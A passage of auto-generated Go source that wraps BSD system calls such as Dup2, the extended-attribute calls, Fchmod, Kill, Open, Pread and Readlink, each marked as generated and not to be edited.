errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Dup2(from int, to int) (err error) {\n\t_, _, e1 := Syscall(SYS_DUP2, uintptr(from), uintptr(to), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Exit(code int) {\n\tSyscall(SYS_EXIT, uintptr(code), 0, 0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrGetFd(fd int, attrnamespace int, attrname string, data uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_GET_FD, uintptr(fd), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p0)), uintptr(data), uintptr(nbytes), 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrSetFd(fd int, attrnamespace int, attrname string, data uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_SET_FD, uintptr(fd), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p0)), uintptr(data), uintptr(nbytes), 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrDeleteFd(fd int, attrnamespace int, attrname string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_EXTATTR_DELETE_FD, uintptr(fd), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p0)))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrListFd(fd int, attrnamespace int, data uintptr, nbytes int) (ret int, err error) {\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_LIST_FD, uintptr(fd), uintptr(attrnamespace), uintptr(data), uintptr(nbytes), 0, 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrGetFile(file string, attrnamespace int, attrname string, data uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(file)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_GET_FILE, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p1)), uintptr(data), uintptr(nbytes), 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = 
errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrSetFile(file string, attrnamespace int, attrname string, data uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(file)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_SET_FILE, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p1)), uintptr(data), uintptr(nbytes), 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrDeleteFile(file string, attrnamespace int, attrname string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(file)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_EXTATTR_DELETE_FILE, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p1)))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrListFile(file string, attrnamespace int, data uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(file)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_LIST_FILE, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(data), uintptr(nbytes), 0, 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrGetLink(link string, attrnamespace int, attrname string, data uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(link)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_GET_LINK, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p1)), uintptr(data), uintptr(nbytes), 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrSetLink(link string, attrnamespace int, attrname string, data uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(link)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_SET_LINK, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p1)), uintptr(data), uintptr(nbytes), 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrDeleteLink(link string, attrnamespace int, attrname string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(link)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(attrname)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_EXTATTR_DELETE_LINK, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(unsafe.Pointer(_p1)))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ExtattrListLink(link string, attrnamespace int, data 
uintptr, nbytes int) (ret int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(link)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_EXTATTR_LIST_LINK, uintptr(unsafe.Pointer(_p0)), uintptr(attrnamespace), uintptr(data), uintptr(nbytes), 0, 0)\n\tret = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fadvise(fd int, offset int64, length int64, advice int) (err error) {\n\t_, _, e1 := Syscall6(SYS_POSIX_FADVISE, uintptr(fd), uintptr(offset), uintptr(length), uintptr(advice), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Faccessat(dirfd int, path string, mode uint32, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall6(SYS_FACCESSAT, uintptr(dirfd), uintptr(unsafe.Pointer(_p0)), uintptr(mode), uintptr(flags), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fchdir(fd int) (err error) {\n\t_, _, e1 := Syscall(SYS_FCHDIR, uintptr(fd), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fchflags(fd int, flags int) (err error) {\n\t_, _, e1 := Syscall(SYS_FCHFLAGS, uintptr(fd), uintptr(flags), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fchmod(fd int, mode uint32) (err error) {\n\t_, _, e1 := Syscall(SYS_FCHMOD, uintptr(fd), uintptr(mode), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall6(SYS_FCHMODAT, uintptr(dirfd), uintptr(unsafe.Pointer(_p0)), uintptr(mode), uintptr(flags), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fchown(fd int, uid int, gid int) (err error) {\n\t_, _, e1 := Syscall(SYS_FCHOWN, uintptr(fd), uintptr(uid), uintptr(gid))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fchownat(dirfd int, path string, uid int, gid int, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall6(SYS_FCHOWNAT, uintptr(dirfd), uintptr(unsafe.Pointer(_p0)), uintptr(uid), uintptr(gid), uintptr(flags), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Flock(fd int, how int) (err error) {\n\t_, _, e1 := Syscall(SYS_FLOCK, uintptr(fd), uintptr(how), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fpathconf(fd int, name int) (val int, err error) {\n\tr0, _, e1 := Syscall(SYS_FPATHCONF, uintptr(fd), uintptr(name), 0)\n\tval = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fstat(fd int, stat *Stat_t) (err error) {\n\t_, _, e1 := Syscall(SYS_FSTAT, 
uintptr(fd), uintptr(unsafe.Pointer(stat)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall6(SYS_FSTATAT, uintptr(fd), uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(stat)), uintptr(flags), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fstatfs(fd int, stat *Statfs_t) (err error) {\n\t_, _, e1 := Syscall(SYS_FSTATFS, uintptr(fd), uintptr(unsafe.Pointer(stat)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fsync(fd int) (err error) {\n\t_, _, e1 := Syscall(SYS_FSYNC, uintptr(fd), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Ftruncate(fd int, length int64) (err error) {\n\t_, _, e1 := Syscall(SYS_FTRUNCATE, uintptr(fd), uintptr(length), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getdents(fd int, buf []byte) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(buf) > 0 {\n\t\t_p0 = unsafe.Pointer(&buf[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall(SYS_GETDENTS, uintptr(fd), uintptr(_p0), uintptr(len(buf)))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getdirentries(fd int, buf []byte, basep *uintptr) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(buf) > 0 {\n\t\t_p0 = unsafe.Pointer(&buf[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall6(SYS_GETDIRENTRIES, uintptr(fd), uintptr(_p0), uintptr(len(buf)), uintptr(unsafe.Pointer(basep)), 0, 0)\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getdtablesize() (size int) {\n\tr0, _, _ := Syscall(SYS_GETDTABLESIZE, 0, 0, 0)\n\tsize = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getegid() (egid int) {\n\tr0, _, _ := RawSyscall(SYS_GETEGID, 0, 0, 0)\n\tegid = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Geteuid() (uid int) {\n\tr0, _, _ := RawSyscall(SYS_GETEUID, 0, 0, 0)\n\tuid = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getgid() (gid int) {\n\tr0, _, _ := RawSyscall(SYS_GETGID, 0, 0, 0)\n\tgid = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getpgid(pid int) (pgid int, err error) {\n\tr0, _, e1 := RawSyscall(SYS_GETPGID, uintptr(pid), 0, 0)\n\tpgid = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getpgrp() (pgrp int) {\n\tr0, _, _ := RawSyscall(SYS_GETPGRP, 0, 0, 0)\n\tpgrp = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getpid() (pid int) {\n\tr0, _, _ := RawSyscall(SYS_GETPID, 0, 0, 0)\n\tpid = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc 
Getppid() (ppid int) {\n\tr0, _, _ := RawSyscall(SYS_GETPPID, 0, 0, 0)\n\tppid = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getpriority(which int, who int) (prio int, err error) {\n\tr0, _, e1 := Syscall(SYS_GETPRIORITY, uintptr(which), uintptr(who), 0)\n\tprio = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getrlimit(which int, lim *Rlimit) (err error) {\n\t_, _, e1 := RawSyscall(SYS_GETRLIMIT, uintptr(which), uintptr(unsafe.Pointer(lim)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getrusage(who int, rusage *Rusage) (err error) {\n\t_, _, e1 := RawSyscall(SYS_GETRUSAGE, uintptr(who), uintptr(unsafe.Pointer(rusage)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getsid(pid int) (sid int, err error) {\n\tr0, _, e1 := RawSyscall(SYS_GETSID, uintptr(pid), 0, 0)\n\tsid = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Gettimeofday(tv *Timeval) (err error) {\n\t_, _, e1 := RawSyscall(SYS_GETTIMEOFDAY, uintptr(unsafe.Pointer(tv)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getuid() (uid int) {\n\tr0, _, _ := RawSyscall(SYS_GETUID, 0, 0, 0)\n\tuid = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Issetugid() (tainted bool) {\n\tr0, _, _ := Syscall(SYS_ISSETUGID, 0, 0, 0)\n\ttainted = bool(r0 != 0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Kill(pid int, signum syscall.Signal) (err error) {\n\t_, _, e1 := Syscall(SYS_KILL, uintptr(pid), uintptr(signum), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Kqueue() (fd int, err error) {\n\tr0, _, e1 := Syscall(SYS_KQUEUE, 0, 0, 0)\n\tfd = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Lchown(path string, uid int, gid int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_LCHOWN, uintptr(unsafe.Pointer(_p0)), uintptr(uid), uintptr(gid))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Link(path string, link string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(link)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_LINK, uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(_p1)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Linkat(pathfd int, path string, linkfd int, link string, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(link)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall6(SYS_LINKAT, uintptr(pathfd), uintptr(unsafe.Pointer(_p0)), uintptr(linkfd), 
uintptr(unsafe.Pointer(_p1)), uintptr(flags), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Listen(s int, backlog int) (err error) {\n\t_, _, e1 := Syscall(SYS_LISTEN, uintptr(s), uintptr(backlog), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Lstat(path string, stat *Stat_t) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_LSTAT, uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(stat)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Mkdir(path string, mode uint32) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_MKDIR, uintptr(unsafe.Pointer(_p0)), uintptr(mode), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Mkdirat(dirfd int, path string, mode uint32) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_MKDIRAT, uintptr(dirfd), uintptr(unsafe.Pointer(_p0)), uintptr(mode))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Mkfifo(path string, mode uint32) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_MKFIFO, uintptr(unsafe.Pointer(_p0)), uintptr(mode), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Mknod(path string, mode uint32, dev int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_MKNOD, uintptr(unsafe.Pointer(_p0)), uintptr(mode), uintptr(dev))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Nanosleep(time *Timespec, leftover *Timespec) (err error) {\n\t_, _, e1 := Syscall(SYS_NANOSLEEP, uintptr(unsafe.Pointer(time)), uintptr(unsafe.Pointer(leftover)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Open(path string, mode int, perm uint32) (fd int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall(SYS_OPEN, uintptr(unsafe.Pointer(_p0)), uintptr(mode), uintptr(perm))\n\tfd = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Openat(fdat int, path string, mode int, perm uint32) (fd int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_OPENAT, uintptr(fdat), uintptr(unsafe.Pointer(_p0)), uintptr(mode), uintptr(perm), 0, 0)\n\tfd = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Pathconf(path string, name int) (val int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := 
Syscall(SYS_PATHCONF, uintptr(unsafe.Pointer(_p0)), uintptr(name), 0)\n\tval = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Pread(fd int, p []byte, offset int64) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(p) > 0 {\n\t\t_p0 = unsafe.Pointer(&p[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall6(SYS_PREAD, uintptr(fd), uintptr(_p0), uintptr(len(p)), uintptr(offset), 0, 0)\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Pwrite(fd int, p []byte, offset int64) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(p) > 0 {\n\t\t_p0 = unsafe.Pointer(&p[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall6(SYS_PWRITE, uintptr(fd), uintptr(_p0), uintptr(len(p)), uintptr(offset), 0, 0)\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc read(fd int, p []byte) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(p) > 0 {\n\t\t_p0 = unsafe.Pointer(&p[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall(SYS_READ, uintptr(fd), uintptr(_p0), uintptr(len(p)))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Readlink(path string, buf []byte) (n int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 unsafe.Pointer\n\tif len(buf) > 0 {\n\t\t_p1 = unsafe.Pointer(&buf[0])\n\t} else {\n\t\t_p1 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall(SYS_READLINK, uintptr(unsafe.Pointer(_p0)), uintptr(_p1), uintptr(len(buf)))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Readlinkat(dirfd int, path string, buf []byte) (n int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 unsafe.Pointer\n\tif len(buf) > 0 {\n\t\t_p1 = unsafe.Pointer(&buf[0])\n\t} else {\n\t\t_p1 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall6(SYS_READLINKAT, uintptr(dirfd), uintptr(unsafe.Pointer(_p0)), uintptr(_p1), uintptr(len(buf)), 0, 0)\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT 